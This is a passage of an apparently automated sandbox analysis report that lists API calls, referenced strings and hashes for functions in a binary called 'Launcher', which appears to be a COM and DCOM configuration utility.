                                                                                                                • Opcode Fuzzy Hash: 456a4efca38090d584c6283b98604b67468c770061978aed07da23d990f03700
                                                                                                                • Instruction Fuzzy Hash: 5B816270640209AFEB21DF74CC89FEF7BBAEB44702F504568F619A61E4DB70A948DB50
                                                                                                                APIs
                                                                                                                • #540.MFC42U(F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EBFF
                                                                                                                • #540.MFC42U(F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EC07
                                                                                                                • #4155.MFC42U(00000004,F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EC11
                                                                                                                • #4155.MFC42U(00000008,00000004,F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EC1B
                                                                                                                • #6398.MFC42U(?,?,?,00000008,00000004,F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EC32
                                                                                                                • #861.MFC42U(ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF,?,?,?,?,?,00B704CF,000000FF), ref: 00B5EC3F
                                                                                                                • #6398.MFC42U(?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF,?,?,?,?,?,00B704CF), ref: 00B5EC4F
                                                                                                                • #861.MFC42U(ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC5C
                                                                                                                • #6398.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC6C
                                                                                                                • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC74
                                                                                                                • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC7C
                                                                                                                • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC84
                                                                                                                • #652.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,F6B930CF), ref: 00B5EC8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6398#800$#4155#540#861$#652
                                                                                                                • String ID: ExpertMode$ViewHiddenComCats
                                                                                                                • API String ID: 800799730-816868219
                                                                                                                • Opcode ID: 410806115858dc09982b2f421c275dfbad96a4bfd790c4fd828b709dfb10e1fe
                                                                                                                • Instruction ID: 09f6da9305e01872a82402f4af1d82f819e14f673e411fb32af2af54370a4bb4
                                                                                                                • Opcode Fuzzy Hash: 410806115858dc09982b2f421c275dfbad96a4bfd790c4fd828b709dfb10e1fe
                                                                                                                • Instruction Fuzzy Hash: 05215B35A00555ABCF25EB90CC52EBEB7F5FF64B00F0005A9B422676E1EBB96E04CB11
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001,?,?,00B6BA6A,?), ref: 00B6C8C5
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00B6BA6A,?), ref: 00B6C8CC
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00B6BA6A,?,00B6BA6A,?), ref: 00B6C8E7
                                                                                                                • GetLastError.KERNEL32(?,00B6BA6A,?), ref: 00B6C8ED
                                                                                                                • CloseHandle.KERNEL32(?,00B6BA6A,?), ref: 00B6C921
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2078281146-0
                                                                                                                • Opcode ID: 64c4b5e22f203e5b9f32d9d0c5d4a0b4902ea064c2aae185370d703b2a5a13ba
                                                                                                                • Instruction ID: 391f8493d1d752b111464dc4a44a2d106618adf2bf815bdcaca2af18c86b913e
                                                                                                                • Opcode Fuzzy Hash: 64c4b5e22f203e5b9f32d9d0c5d4a0b4902ea064c2aae185370d703b2a5a13ba
                                                                                                                • Instruction Fuzzy Hash: 2831B036540115EBCB125BA5EC48ABE7FB9FB45312B2140A6F989E71A0DF398D80DB60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B5C086
                                                                                                                • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo,Access Permissions,00000004), ref: 00B5C09E
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B5C0B3
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C0BA
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B5C0EA
                                                                                                                • #2634.MFC42U(00000000), ref: 00B5C0F7
                                                                                                                • #2634.MFC42U(00000000,00000000), ref: 00B5C103
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B5C10E
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C115
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5C12D
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5C13D
                                                                                                                Strings
                                                                                                                • AccessPermission, xrefs: 00B5C0C0
                                                                                                                • Access Permissions, xrefs: 00B5C092
                                                                                                                • Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo, xrefs: 00B5C097
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMessageSend$#2634Load$#4219
                                                                                                                • String ID: Access Permissions$AccessPermission$Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo
                                                                                                                • API String ID: 2901272449-2859256857
                                                                                                                • Opcode ID: 4b07c1104956a11a5ac7d0846224313c194198c837ef496e5e5ab02b819182ad
                                                                                                                • Instruction ID: fe2d9717b23432b0468d68da621bdc395238d67ebec6591b7472b88dd2304120
                                                                                                                • Opcode Fuzzy Hash: 4b07c1104956a11a5ac7d0846224313c194198c837ef496e5e5ab02b819182ad
                                                                                                                • Instruction Fuzzy Hash: 2A11A531640610BAEB251F61EC8EFD73BA9DF87713F1140B4FE19AA0A5CF650844D6B0
                                                                                                                APIs
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,AppID,00000000), ref: 00B65653
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000100), ref: 00B6569A
                                                                                                                • wsprintfW.USER32 ref: 00B65754
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,?,?,00000100), ref: 00B65777
                                                                                                                • CLSIDFromString.OLE32(00000000,-00000008), ref: 00B657CF
                                                                                                                • lstrcpyW.KERNEL32(-00000084,?), ref: 00B6584A
                                                                                                                • lstrlenW.KERNEL32(?), ref: 00B658A8
                                                                                                                • wsprintfW.USER32 ref: 00B658C5
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B658FE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$CloseEnumFromOpenQueryStringValuelstrcpylstrlen
                                                                                                                • String ID: '$AppID$AppID\%s$[AppID: %s]
                                                                                                                • API String ID: 1953670596-3682975055
                                                                                                                • Opcode ID: 07eb004bbdb0ff994f07aa96a365229b65c586eccd5f6e4f221c84503032f842
                                                                                                                • Instruction ID: 8eb83a0e0f59caf4de0e927fc37cf72a708601647325bb46d46a9952cbf37eb3
                                                                                                                • Opcode Fuzzy Hash: 07eb004bbdb0ff994f07aa96a365229b65c586eccd5f6e4f221c84503032f842
                                                                                                                • Instruction Fuzzy Hash: 108191B1900A289FDB65CB54DC45BEAB7F8AB08316F1044E9E909E7290DB749FC4CF50
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E482
                                                                                                                • #6211.MFC42U(00000005,?,?,?,?,?,00B5E130,?,?), ref: 00B5E49B
                                                                                                                • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00B5E4AA
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E4BE
                                                                                                                  • Part of subcall function 00B5E583: #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E5BE
                                                                                                                  • Part of subcall function 00B5E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E669
                                                                                                                • SendMessageW.USER32(?,00001308,00000001,00000000), ref: 00B5E4DA
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E4ED
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E504
                                                                                                                • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00B5E528
                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B5E53B
                                                                                                                • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00B5E555
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00B5E130,?,?), ref: 00B5E569
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00B5E130,?,?), ref: 00B5E578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$RedrawWindow$#6211
                                                                                                                • String ID: Registry
                                                                                                                • API String ID: 2246854860-886996828
                                                                                                                • Opcode ID: 52eef3f0b414d2ef14fa20603fabf28912dfa9647450bb77a7bd37f2388dac21
                                                                                                                • Instruction ID: fefb6f67a2471f06af53e6f9488a218b6d65ff9724e235d3680346719debc9df
                                                                                                                • Opcode Fuzzy Hash: 52eef3f0b414d2ef14fa20603fabf28912dfa9647450bb77a7bd37f2388dac21
                                                                                                                • Instruction Fuzzy Hash: D32183B1504A08BFF7261B70DC89EAB7AEDFB4975BF410454F62E920A0DF756D408E60
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5F34D
                                                                                                                • #324.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F35E
                                                                                                                • #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F375
                                                                                                                • #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F38F
                                                                                                                • #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3AA
                                                                                                                • #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3C0
                                                                                                                • #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3DA
                                                                                                                • #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3EF
                                                                                                                • #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F400
                                                                                                                • #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F40F
                                                                                                                • #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F420
                                                                                                                • #861.MFC42U(00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F436
                                                                                                                • #861.MFC42U(00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F442
                                                                                                                • #861.MFC42U(00B521A0,00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F453
                                                                                                                • #861.MFC42U(00B521A0,00B521A0,00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F45F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567$#540#861$#324H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1167559088-0
                                                                                                                • Opcode ID: 6ea8ce70be89a55480ee314c592a817730916325c688c1d206d1834e72b3ec0c
                                                                                                                • Instruction ID: 78e01aa342fc5a53c75dbe845806582f854f4847cc95b643e3b7de9eca644a4c
                                                                                                                • Opcode Fuzzy Hash: 6ea8ce70be89a55480ee314c592a817730916325c688c1d206d1834e72b3ec0c
                                                                                                                • Instruction Fuzzy Hash: 4E319C75A01646DBEB05EF64C9413DDBBE0AF65300F5040CDA99137382DBB86B08CBD1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D70D
                                                                                                                  • Part of subcall function 00B6D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00B6D6E4,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D72C
                                                                                                                  • Part of subcall function 00B6D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00B6D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00B6D738
                                                                                                                • lstrcmpiW.KERNEL32(?,00B52778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00B6B6E0
                                                                                                                • lstrcmpiW.KERNEL32(?,00B52778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00B6B726
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B6B749
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B6B76E
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B6B7B1
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B6B7DC
                                                                                                                • #5273.MFC42U(80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,00B52778), ref: 00B6B809
                                                                                                                • #1197.MFC42U(These changes will take effect after you restart your computer.,00000000,00000000), ref: 00B6B81F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcmpi$#1197#5273CloseOpenQueryValue
                                                                                                                • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE$These changes will take effect after you restart your computer.
                                                                                                                • API String ID: 2271089683-166272277
                                                                                                                • Opcode ID: 321031aff47502f9f63799a2f0bfe92045a5ae0eeff8fae613cedaa5f6043c15
                                                                                                                • Instruction ID: 9b1184bb45d394ea1d121bd851709abe2ddecbc778d23bcd25ab20db2cb691b3
                                                                                                                • Opcode Fuzzy Hash: 321031aff47502f9f63799a2f0bfe92045a5ae0eeff8fae613cedaa5f6043c15
                                                                                                                • Instruction Fuzzy Hash: F5416471780315A6EB305B20CC8AF7A73E8EB54B06F1041E5FA19F6092DFA4ADC99644
                                                                                                                APIs
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00B73B00,00000FA0), ref: 00B6F1B0
                                                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00B6F1BB
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B6F1CC
                                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B6F1DE
                                                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B6F1EC
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B6F21E
                                                                                                                • DeleteCriticalSection.KERNEL32(00B73B00,00000007), ref: 00B6F245
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00B6F255
                                                                                                                Strings
                                                                                                                • SleepConditionVariableCS, xrefs: 00B6F1D8
                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B6F1B6
                                                                                                                • WakeAllConditionVariable, xrefs: 00B6F1E4
                                                                                                                • kernel32.dll, xrefs: 00B6F1C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                • API String ID: 2565136772-3242537097
                                                                                                                • Opcode ID: 3f26d42a30c12346c2d4c8b6146a20a6453a58115073db9e817363de5c2336bb
                                                                                                                • Instruction ID: 159ec6be064d124ccfab46b9157db933c95f1863c715371d5bc264b8d8a11d99
                                                                                                                • Opcode Fuzzy Hash: 3f26d42a30c12346c2d4c8b6146a20a6453a58115073db9e817363de5c2336bb
                                                                                                                • Instruction Fuzzy Hash: 3C01A535644312ABC7206774BC1EE2A3AE5EB45B52B0400A0FD09E32A0DF68CD818AA6
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5F29A
                                                                                                                • lstrcpyW.KERNEL32(?,Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|,00000548), ref: 00B5F2AD
                                                                                                                • #355.MFC42U(00000001,00000000,00B521A0,00001804,?), ref: 00B5F2D0
                                                                                                                • #2507.MFC42U ref: 00B5F2E8
                                                                                                                • #3494.MFC42U(?), ref: 00B5F2FF
                                                                                                                • #858.MFC42U(00000000,?), ref: 00B5F30F
                                                                                                                • #800.MFC42U(00000000,?), ref: 00B5F31D
                                                                                                                • #6330.MFC42U(00000000,00000000,?), ref: 00B5F325
                                                                                                                • #800.MFC42U ref: 00B5F330
                                                                                                                • #641.MFC42U ref: 00B5F33B
                                                                                                                Strings
                                                                                                                • Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|, xrefs: 00B5F2A1
                                                                                                                • Open COM Surrogate Server, xrefs: 00B5F2DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                                                                • String ID: Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|$Open COM Surrogate Server
                                                                                                                • API String ID: 2485399651-276578773
                                                                                                                • Opcode ID: 0dbf87bc6b4a50b934d8a5bf8232870b6e773a170efb57e7de5c691a649d34b3
                                                                                                                • Instruction ID: 09ed2a699c8f7eb137a3958fa2c8d6824b00a27d3e259d92b6edc264c3c14c6a
                                                                                                                • Opcode Fuzzy Hash: 0dbf87bc6b4a50b934d8a5bf8232870b6e773a170efb57e7de5c691a649d34b3
                                                                                                                • Instruction Fuzzy Hash: 1E012171940518AEDB14EB54CC92AEEB3F8BF15306F8000E9B519A7181DFB85F88CF51
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5EF2A
                                                                                                                • lstrcpyW.KERNEL32(?,Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|,00000548), ref: 00B5EF3D
                                                                                                                • #355.MFC42U(00000001,00000000,00B521A0,00001804,?), ref: 00B5EF60
                                                                                                                • #2507.MFC42U ref: 00B5EF78
                                                                                                                • #3494.MFC42U(?), ref: 00B5EF8F
                                                                                                                • #858.MFC42U(00000000,?), ref: 00B5EF9F
                                                                                                                • #800.MFC42U(00000000,?), ref: 00B5EFAD
                                                                                                                • #6330.MFC42U(00000000,00000000,?), ref: 00B5EFB5
                                                                                                                • #800.MFC42U ref: 00B5EFC0
                                                                                                                • #641.MFC42U ref: 00B5EFCB
                                                                                                                Strings
                                                                                                                • Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|, xrefs: 00B5EF31
                                                                                                                • Open COM Server, xrefs: 00B5EF6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                                                                • String ID: Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|$Open COM Server
                                                                                                                • API String ID: 2485399651-2085683529
                                                                                                                • Opcode ID: 6905e6004eacc66de92ca76e8568cb3eb1deed74f8380d41cd480311207a1b0f
                                                                                                                • Instruction ID: ef51bbcbd19a59b4daa5cb10f2cd098e85196f5abeab4a800039717bcc28a543
                                                                                                                • Opcode Fuzzy Hash: 6905e6004eacc66de92ca76e8568cb3eb1deed74f8380d41cd480311207a1b0f
                                                                                                                • Instruction Fuzzy Hash: 4F0112719406189ADB14EB54CC92AEE73E8AF15306F4040E9B519A7181DFB45F88CE51
                                                                                                                APIs
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B6BF47
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B6BF51
                                                                                                                • GetExplicitEntriesFromAclW.ADVAPI32(?,?,?), ref: 00B6BF7F
                                                                                                                • SetEntriesInAclW.ADVAPI32(?,?,00000000,?), ref: 00B6BF94
                                                                                                                • MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00B6BFBD
                                                                                                                • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B6C018
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B6C030
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B6C044
                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B6C053
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B6C065
                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00B6C0A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Make$AbsoluteDaclDescriptorEntriesLocalRelativeSecuritySelf$AllocErrorExplicitFreeFromLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 559786115-0
                                                                                                                • Opcode ID: 093c09d9b88f8c65ac40300002ec8cd583a16baba5c0dd5c6938a1570b8fc3b0
                                                                                                                • Instruction ID: bf9770a3d3b9bc2f81b03548d64fc6fd11cca023740e47dcc6cfea1e28996cad
                                                                                                                • Opcode Fuzzy Hash: 093c09d9b88f8c65ac40300002ec8cd583a16baba5c0dd5c6938a1570b8fc3b0
                                                                                                                • Instruction Fuzzy Hash: 1751A3B6900119AF9B11DF95DC85DEEBBBDEF08751B14406AFA09E3120DB349A84DBA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B60BE4
